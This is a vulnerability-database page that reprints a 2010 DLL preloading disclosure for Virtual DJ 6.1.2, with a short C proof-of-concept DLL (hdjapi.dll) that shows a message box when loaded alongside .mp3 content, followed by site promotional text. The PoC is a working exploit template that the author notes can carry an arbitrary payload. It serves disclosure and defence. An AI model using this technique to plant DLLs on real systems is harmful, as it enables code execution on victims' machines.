Lucene search
K

Virtual DJ 6.1.2 DLL Hijacking Exploit

🗓️ 30 Aug 2010 00:00:00Reported by Classity Security ScansType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Virtual DJ 6.1.2 DLL Hijacking Exploit, August 29, 2010, classity.n

Code
`/*   
  
Description: Virtual DJ 6.1.2 Also vulnerable for DLL Preloading on hdjapi.dll while loading .mp3 content.  
Date: August 29, 2010   
Author: <a href="http://www.classity.nl/">Classity informatiebeveiliging</a>  
  
PoC: Displaying message box, but can be replaced by DLL with arbitrary payload.   
  
*/   
  
  
  
#include <windows.h>   
#define DllExport __declspec (dllexport)   
  
BOOL WINAPI DllMain (   
HANDLE hinstDLL,   
DWORD fdwReason,   
LPVOID lpvReserved)   
{   
dll_pl();   
return 0;   
}   
  
int dll_pl()   
{   
MessageBox(0, "Virtual DJ Vulnerable for DLL Preloading!", "DLL Message", MB_OK);   
return 0;   
}   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation